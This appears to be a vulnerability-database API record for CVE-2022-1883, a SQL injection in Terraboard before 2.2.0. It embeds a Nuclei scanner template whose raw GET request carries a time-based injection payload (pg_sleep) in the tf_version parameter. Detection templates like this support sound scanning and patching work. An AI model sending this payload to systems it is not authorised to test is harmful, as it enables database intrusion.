{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-1883/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-1883/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-1883/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-1883/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-1883/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-1883"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-1883"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-1883.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2022-1883\n\ninfo:\n  name: Terraboard <2.2.0 - SQL Injection\n  author: edoardottt\n  severity: high\n  description: |\n    Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n  remediation: |\n    Upgrade Terraboard to version 2.2.0 or later to mitigate the SQL Injection vulnerability.\n  reference:\n    - https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/\n    - https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc\n    - https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-1883\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2022-1883\n    cwe-id: CWE-89\n    epss-score: 0.0676\n    epss-percentile: 0.93728\n    cpe: cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: camptocamp\n    product: terraboard\n  tags: time-based-sqli,cve,cve2022,terraboard,sqli,huntr,camptocamp,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 15s\n        GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=7'\n\n      - type: word\n        part: body\n        words:\n          - '\"page\":'\n          - '\"results\":'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100d0b3502c7c16d0e6d86ae67cb8955907ba94f0c4a0de1fcacced62cd867b4744022053caf1a0ca693c3b8e134dd9ffd2799b83acf745c44db8c36a896b36a6cc6906:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-1883"
}